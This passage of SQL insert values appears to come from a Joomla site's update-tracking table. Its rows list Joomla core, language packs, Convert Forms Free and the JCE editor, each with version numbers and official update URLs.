(1451, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1452, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1453, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1454, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1455, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(1456, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1457, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1458, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1459, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1460, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1461, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1462, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1463, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1464, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1465, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1466, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1467, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1468, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1469, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(1470, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1471, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1472, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1473, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1474, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1475, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1476, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1477, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1478, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1479, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(1480, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1481, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1482, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1483, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1484, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1485, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1486, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1487, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1488, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1489, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1490, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1491, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1492, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1493, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1494, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1495, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1496, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1497, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1498, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1499, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1500, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1501, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(1502, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1503, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1504, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1505, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1506, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1507, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1508, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1509, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1510, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1511, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1512, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1513, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1514, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1515, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(1516, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1517, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1518, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1519, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1520, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1521, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1522, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1523, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1524, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1525, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1526, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1527, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(1528, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1529, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1530, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1531, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1532, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1533, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1534, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1535, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1536, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1537, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1538, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1539, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1540, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1541, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1542, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1543, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1544, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1545, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1546, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1547, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1548, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1549, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(1550, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1551, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1552, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1553, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1554, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1555, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1556, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1557, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1558, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1559, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1560, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1561, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1562, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.4.0', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=525', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1563, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(1564, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1565, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1566, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1567, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1568, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1569, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1570, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1571, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1572, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1573, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1574, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1575, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1576, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1577, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1578, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1579, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1580, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1581, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1582, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1583, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1584, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1585, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1586, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1587, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1588, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1589, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1590, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1591, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1592, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(1593, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1594, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1595, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1596, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1597, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1598, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1599, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1600, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1601, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1602, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1603, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1604, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1605, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1606, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1607, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1608, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1609, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1610, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1611, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1612, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1613, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1614, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(1615, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1616, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1617, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1618, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1619, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1620, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1621, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1622, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1623, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1624, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1625, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1626, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
